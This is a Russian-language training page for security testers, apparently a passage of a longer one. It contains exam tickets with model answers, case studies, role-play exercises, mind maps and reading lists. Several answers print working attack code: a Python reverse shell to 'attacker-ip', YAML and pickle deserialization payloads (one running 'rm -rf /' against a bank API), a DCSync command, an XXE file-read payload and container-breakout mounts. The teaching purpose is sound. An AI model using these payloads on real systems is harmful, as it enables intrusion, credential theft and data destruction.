  • Использование VPN/SSL

  • Проверка сертификатов

  • Отключение небезопасных протоколов (SSLv2, SSLv3)

Практическая часть:
Задание: Создайте Reverse Shell на Python.
✅ Ответ:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker-ip",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])

 

Билет №7

Теоретическая часть:

  1. Какие уязвимости возможны в JWT?
    ✅ Ответ:

  • Подбор секретного ключа (brute force)

  • Алгоритм "none"

  • Подделка заголовка (alg: HS256 → RS256)

  1. Какие угрозы безопасности существуют для Docker?
    ✅ Ответ:

  • Breakout через уязвимости ядра

  • Небезопасные конфигурации

  • Утечки чувствительных данных

Практическая часть:
Задание: Напишите команду для проверки Docker-контейнера на уязвимости.
✅ Ответ:

docker scan my-container

 

Билет №8

Теоретическая часть:

  1. Что такое "Deserialization Attack"?
    ✅ Ответ:
    Эксплуатация уязвимостей в процессах десериализации данных для выполнения произвольного кода.

  2. Как работает атака "DNS Cache Poisoning"?
    ✅ Ответ:
    Подмена DNS-записей в кэше сервера для перенаправления трафика.

Практическая часть:
Задание: Напишите YAML-конфигурацию для проверки уязвимости десериализации в Python.
✅ Ответ:

test_case:
  input: !!python/object/apply:os.system ["whoami"]
  expected: "Error"

 

Билет №9

Теоретическая часть:

  1. Объясните принцип работы атаки "Race Condition".
    ✅ Ответ:
    Эксплуатация временного окна между проверкой условия и его использованием.

  2. Что такое "Side-Channel Attack"?
    ✅ Ответ:
    Атака, использующая побочные каналы информации (время выполнения, энергопотребление).

Практическая часть:
Задание: Напишите скрипт для демонстрации Race Condition.
✅ Ответ:

import os
while True:
    try: os.remove("/tmp/test.lock")
    except: pass
    open("/tmp/test.lock","w").close()

 

Билет №10

Теоретическая часть:

  1. Что такое "Active Directory Attack"?
    ✅ Ответ:
    Комплекс атак на инфраструктуру AD:

  • Pass-the-Hash

  • Golden Ticket

  • DCSync

  1. Как защитить Active Directory?
    ✅ Ответ:

  • Регулярные обновления

  • Мониторинг аномальной активности

  • Ограничение прав доступа

Практическая часть:
Задание: Напишите команду для выполнения DCSync-атаки.
✅ Ответ:

secretsdump.py domain/user:password@dc_ip

 

Билет №11

Теоретическая часть:

  1. Что такое "API Security"?
    ✅ Ответ:
    Меры защиты API от:

  • Неавторизованного доступа

  • Инъекций

  • Чрезмерного потребления ресурсов

  1. Какие уязвимости характерны для GraphQL?
    ✅ Ответ:

  • Introspection-атаки

  • Batch-запросы для DoS

  • Инъекции через аргументы

Практическая часть:
Задание: Напишите запрос для обнаружения introspection в GraphQL.
✅ Ответ:

query { __schema { types { name } } }

 

Билет №12

Теоретическая часть:

  1. Что такое "Cloud Security"?
    ✅ Ответ:
    Защита облачных сред:

  • IAM политики

  • Шифрование данных

  • Мониторинг активности

  1. Какие угрозы характерны для AWS S3?
    ✅ Ответ:

  • Публичный доступ к бакетам

  • Утечки учетных данных

  • Небезопасные ACL

Практическая часть:
Задание: Напишите команду AWS CLI для проверки прав доступа к S3.
✅ Ответ:

aws s3api get-bucket-acl --bucket my-bucket

 

Билет №13

Теоретическая часть:

  1. Что такое "Red Team Operations"?
    ✅ Ответ:
    Имитация атак реальных злоумышленников для оценки безопасности.

  2. Какие этапы включает кибер-разведка?
    ✅ Ответ:

  3. Сбор информации (OSINT)

  4. Анализ уязвимостей

  5. Планирование атак

Практическая часть:
Задание: Напишите команду для сканирования подсети с помощью Nmap.
✅ Ответ:

nmap -sn 192.168.1.0/24

 

Билет №14

Теоретическая часть:

  1. Что такое "Threat Modeling"?
    ✅ Ответ:
    Процесс идентификации и оценки угроз для системы.

  2. Какие методы анализа угроз вы знаете?
    ✅ Ответ:

  • STRIDE

  • PASTA

  • Attack Trees

Практическая часть:
Задание: Составьте таблицу угроз для веб-приложения по методике STRIDE.
✅ Ответ:

| Угроза       | Пример               |
|--------------|---------------------|
| Spoofing     | Подделка сессии     |
| Tampering    | Изменение данных    |
| Repudiation  | Отказ от действий   |

 

Билет №15

Теоретическая часть:

  1. Объясните принцип работы атаки "XXE Injection" и методы защиты от неё
    ✅ Ответ:
    XXE (XML External Entity) - атака, использующая обработку внешних сущностей в XML.
    Эксплуатация:

  • Чтение локальных файлов через <!ENTITY xxe SYSTEM "file:///etc/passwd">

  • SSRF-атаки
    Защита:

  • Отключение обработки DTD

  • Использование JSON вместо XML

  • Валидация входящих данных

  1. Что такое "Сетевая сегментация" и как она повышает безопасность?
    ✅ Ответ:
    Разделение сети на изолированные зоны (сегменты) для:

  • Ограничения горизонта атак

  • Минимизации последствий взлома

  • Контроля трафика между сегментами

Практическая часть:

Задание: Напишите эксплойт для XXE-атаки, читающий содержимое файла /etc/passwd
✅ Ответ:

<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>&xxe;</user>

Кейс №1: Уязвимость в API интернет-банка

Описание ситуации:
Команда разработала новый REST API для мобильного приложения банка. Функционал позволяет:

  • Просматривать баланс

  • Совершать переводы

  • Управлять шаблонами платежей

Скрытые проблемы:

  1. Отсутствие rate-limiting – API не ограничивает количество запросов, что позволяет проводить brute force атак.

  2. Информационная утечка – В ответах содержатся технические детали (версии ПО, внутренние IP).

  3. Небезопасная десериализация – Параметр session_data принимает сериализованные объекты.

  4. Слабый CORS – Разрешены запросы с любого домена (Access-Control-Allow-Origin: *).

Решение:

  1. Внедрить лимит запросов (например, 100/мин на IP).

  2. Удалить технические данные из ответов.

  3. Заменить десериализацию на JSON Web Tokens.

  4. Ограничить CORS доверенными доменами.

Пример эксплойта для десериализации (Python):

import requests
import pickle

class Exploit:
    def __reduce__(self):
        return (eval, ("os.system('rm -rf /')",))

malicious_data = pickle.dumps(Exploit())
requests.post("https://bank.com/api/transfer", json={"session_data": malicious_data})

 

Кейс №2: Компрометация Docker-контейнера

Описание ситуации:
В компании используют Docker для развертывания веб-приложения. Контейнер включает:

  • Nginx (порт 80)

  • Python-приложение (порт 5000)

  • Базу данных PostgreSQL

Скрытые проблемы:

  1. Привилегированный режим – Контейнер запущен с --privileged.

  2. Утечка секретов – Креды к БД хранятся в переменных окружения.

  3. Отсутствие AppArmor – Нет профиля безопасности.

  4. Устаревший образ – Используется python:2.7 с известными уязвимостями.

Решение:

  1. Запускать контейнер с --security-opt=no-new-privileges.

  2. Использовать Docker Secrets или HashiCorp Vault.

  3. Настроить AppArmor профиль:

    docker run --security-opt apparmor=docker-default ...

     

  4. Обновить образ до python:3.11-slim.

Пример эксплуатации (Breakout):

# Внутри контейнера:
mkdir /mnt/host
mount /dev/sda1 /mnt/host  # Получаем доступ к файловой системе хоста

Ролевая игра №1: "Киберучения в корпоративной сети"

Цель:
Отработать навыки реагирования на инциденты и координации между командами.

Формат:

  • Смешанный (очный/онлайн)

  • Продолжительность: 2-3 часа

  • Уровень сложности: Средний

Сеттинг:
Компания "FinSecure" обнаружила подозрительную активность в своей сети:

  • Неизвестные SSH-подключения к серверам

  • Подозрительные исходящие соединения в Tor

Роли:

Роль Обязанности
Blue Team (3-4 чел.) Анализ логов, блокировка угроз
Red Team (2 чел.) Имитация атак (Pass-the-Hash, Exfiltration)
SOC-аналитик (1 чел.) Корреляция событий в SIEM
CISO (1 чел.) Принятие решений, отчетность руководству

Этапы:

  1. Обнаружение: Blue Team находит артефакты атаки в логах.

  2. Сдерживание: Блокировка IP, изоляция зараженных узлов.

  3. Расследование: Анализ памяти, поиск IOC.

  4. Восстановление: Патчинг уязвимостей.

Обучающие эффекты:

  • Работа с SIEM (Splunk/ELK)

  • Анализ сетевого трафика (Wireshark)

  • Навыки командной коммуникации

Проблемы:

  • Конфликт между Red/Blue Team из-за нечетких правил

  • Перегрузка SOC ложными срабатываниями

 

Ролевая игра №2: "Фишинговая атака на компанию"

Цель:
Научить распознавать и предотвращать социальную инженерию.

Формат:

  • Онлайн-симуляция

  • Длительность: 1 неделя (этапный сценарий)

  • Уровень: Начальный

Сеттинг:
Red Team отправляет сотрудникам:

  • Поддельные письма "от HR" с вредоносными вложениями

  • СМС с ссылками на фейковый корпоративный портал

Роли:

Роль Задачи
Атакующие (2 чел.) Разработка фишинговых сценариев
Сотрудники (10+ чел.) Реакция на письма/СМС
ИБ-отдел (3 чел.) Мониторинг почты, обучение коллег

Этапы:

  1. Разведка: Сбор информации о сотрудниках (LinkedIn).

  2. Атака: Рассылка писем.

  3. Анализ: Статистика кликов по ссылкам.

Обучающие эффекты:

  • Распознавание фишинговых триггеров

  • Навыки отчетности об инцидентах

Вызовы:

  • Этика: сотрудники могут ощущать дискомфорт

  • Ложные срабатывания (например, блокировка легитимных писем)

 

Ролевая игра №3: "Захват флага в облаке"

Цель:
Отработать пентест облачной инфраструктуры (AWS/GCP).

Формат:

  • CTF-соревнование

  • Время: 4 часа

  • Уровень: Продвинутый

Сеттинг:
Виртуальная облачная среда с уязвимостями:

  • Открытые S3-бакеты

  • Неограниченные IAM-роли

  • Устаревшие EC2-инстансы

Роли:

Роль Инструменты
Пентестеры (3 чел.) Pacu, ScoutSuite, Metasploit
DevOps (2 чел.) Мониторинг CloudTrail, ответные меры

Этапы:

  1. Разведка: Обнаружение ресурсов.

  2. Эксплуатация: Получение доступа к флагам.

  3. Эскалация: Захват аккаунта администратора.

Обучающие эффекты:

  • Работа с AWS CLI

  • Понимание политик IAM

Проблемы:

  • Высокий порог входа (требуются знания облачных сервисов)

 

Ролевая игра №4: "Кризис в больнице: атака на медицинское IoT"

Цель:
Показать риски безопасности в медицинских устройствах.

Формат:

  • Очная симуляция

  • Длительность: 3 часа

  • Уровень: Экспертный

Сеттинг:
Больница использует:

  • Умные инфузионные насосы

  • DICOM-серверы с изображениями

  • Незащищенную Wi-Fi сеть

Роли:

Роль Действия
Хакеры (2 чел.) Взлом устройств, шифрование данных
Врачи (3 чел.) Работа в условиях сбоев
Техподдержка (2 чел.) Восстановление систем

Этапы:

  1. Эксплуатация: Перехват данных с насосов.

  2. Кризис: Отказ оборудования в реанимации.

  3. Ответные меры: Поиск бэкдоров.

Обучающие эффекты:

  • Понимание уязвимостей IoT

  • Принятие решений в условиях стресса

Вызовы:

  • Эмоциональная нагрузка (медицинский контекст)

1. Карта "Основные направления в тестировании безопасности"

Центральная тема: Профессия "Тестировщик безопасности"
Ветви:

  1. Теоретические основы

    • Кибербезопасность

    • Принципы CIA (Confidentiality, Integrity, Availability)

    • Угрозы и уязвимости

  2. Технические навыки

    • Работа с инструментами (Burp Suite, Nmap, Metasploit)

    • Анализ кода (SAST/DAST)

    • Сетевые протоколы

  3. Практические сценарии

    • Пентест веб-приложений

    • Аудит мобильных приложений

    • Тестирование API

  4. Сертификации

    • OSCP

    • CEH

    • CompTIA Security+


2. Карта "Этапы тестирования веб-приложений"

Центральная тема: Веб-безопасность
Ветви:

  1. Разведка

    • Сбор информации (Whois, DNS)

    • Анализ технологий (Wappalyzer)

  2. Сканирование

    • Поиск уязвимостей (OWASP ZAP)

    • Автоматизированное тестирование

  3. Эксплуатация

    • SQL-инъекции

    • XSS/CSRF

    • Небезопасные десериализации

  4. Отчетность

    • Документирование уязвимостей

    • Рекомендации по исправлению


3. Карта "Инструменты тестировщика"

Центральная тема: Инструментарий
Ветви:

  1. Для сканирования

    • Nmap

    • OpenVAS

    • Nessus

  2. Для анализа трафика

    • Wireshark

    • Tcpdump

    • Fiddler

  3. Для пентеста

    • Metasploit

    • Burp Suite

    • SQLmap

  4. Для криптоанализа

    • John the Ripper

    • Hashcat


4. Карта "Жизненный цикл уязвимости"

Центральная тема: Обнаружение и устранение уязвимостей
Ветви:

  1. Обнаружение

    • Ручное тестирование

    • Автоматизированное сканирование

  2. Верификация

    • Воспроизведение

    • Оценка рисков

  3. Исправление

    • Патчинг

    • Временные меры

  4. Мониторинг

    • Повторное тестирование

    • Анализ эффективности исправлений


5. Карта "Карьера в безопасности"

Центральная тема: Профессиональное развитие
Ветви:

  1. Начальный уровень

    • Junior Penetration Tester

    • SOC Analyst

  2. Средний уровень

    • Security Engineer

    • Red Team Specialist

  3. Экспертный уровень

    • Security Architect

    • CISO

  4. Навыки для роста

    • Программирование (Python, Bash)

    • Понимание сетевых технологий

    • Знание стандартов (ISO 27001, PCI DSS)


Как использовать эти карты?

  1. Для обучения: Визуализируйте связи между темами.

  2. Для планирования: Определяйте слабые места в знаниях.

  3. Для повторения: Быстро освежайте ключевые концепции

1. Основной учебник

📘 "Web Application Hacker’s Handbook" – Dafydd Stuttard, Marcus Pinto

  • Описание: Классическое руководство по тестированию веб-приложений с фокусом на OWASP Top 10.

  • Для кого: Для углубленного изучения веб-безопасности (SQLi, XSS, CSRF, SSRF).

  • Формат: Теория + практические примеры.

2. Практическое пособие

📘 "The Art of Exploitation" – Jon Erickson

  • Описание: Книга о низкоуровневых уязвимостях (переполнение буфера, шелл-кодинг).

  • Для кого: Для понимания основ эксплуатации бинарных приложений.

  • Формат: Объяснение на языке C с лабораторными работами.

3. Методическое руководство

📘 "Penetration Testing: A Hands-On Introduction to Hacking" – Georgia Weidman

  • Описание: Пошаговое руководство по пентесту (от разведки до пост-эксплуатации).

  • Для кого: Для начинающих и практикующих специалистов.

  • Формат: Упражнения с Kali Linux.

4. Задачник и кейсы

📘 "RTFM: Red Team Field Manual" – Ben Clark

  • Описание: Справочник команд и техник для Red Team.

  • Для кого: Для быстрого поиска решений во время тестирования.

  • Формат: Компактный формат (Cheat Sheet).

5. Научно-методическое пособие

📘 "Security Engineering" – Ross Anderson

  • Описание: Анализ принципов защиты систем (криптография, аутентификация, безопасность ПО).

  • Для кого: Для понимания фундаментальных концепций.

  • Формат: Академический стиль с примерами.

🔐 Для начинающих:

  1. "Основы кибербезопасности: от нуля до первых пентестов"

  2. "Введение в Ethical Hacking: как думает хакер"

  3. "Безопасность веб-приложений: первые шаги в Bug Bounty"

  4. "Практический курс по Kali Linux для новичков"

  5. "Как находить уязвимости: SQLi, XSS, CSRF на практике"

💻 Для практикующих тестировщиков:

  1. "Продвинутый пентест: взлом сетей и эксплуатация уязвимостей"

  2. "Red Team vs Blue Team: симуляция реальных кибератак"

  3. "Взлом и защита Active Directory: от теории до практики"

  4. "Мобильная безопасность: тестирование iOS и Android-приложений"

  5. "API Security: как находить и эксплуатировать уязвимости"

☁️ Для облачных специалистов:

  1. "AWS Security: аудит и взлом облачной инфраструктуры"

  2. "Kubernetes & Docker: безопасность контейнеров в продакшене"

  3. "Cloud Pentesting: от базовых ошибок до сложных атак"

🎯 Для подготовки к сертификациям:

  1. "Полный курс OSCP: подготовка с нуля до сертификации"

  2. "CEH (Certified Ethical Hacker): разбор всех модулей"

  3. "CompTIA Security+: фундамент для старта в cybersecurity"

🚀 Для экспертов:

  1. "Эксплуатация 0-day уязвимостей: reverse engineering и фаззинг"

  2. "Криптография для хакеров: атаки на алгоритмы шифрования"

  3. "Анализ вредоносного ПО (Malware Analysis) с нуля"

  4. "Социальная инженерия: искусство взлома человеческого фактора"

📱 Для узких специализаций:

  1. "IoT Security: тестирование умных устройств"

  2. "Безопасность блокчейна: аудит смарт-контрактов"

  3. "Автоматизация пентеста: Python для тестировщиков"

🎓 Для корпоративного обучения:

  1. "Кибербезопасность для разработчиков: как писать безопасный код"

  2. "Security Awareness: защита бизнеса от фишинга и утечек"

Заявка ученика, студента, слушателя
Заявка преподавателя, репетитора админу сети.
09:20
26
Посещая этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.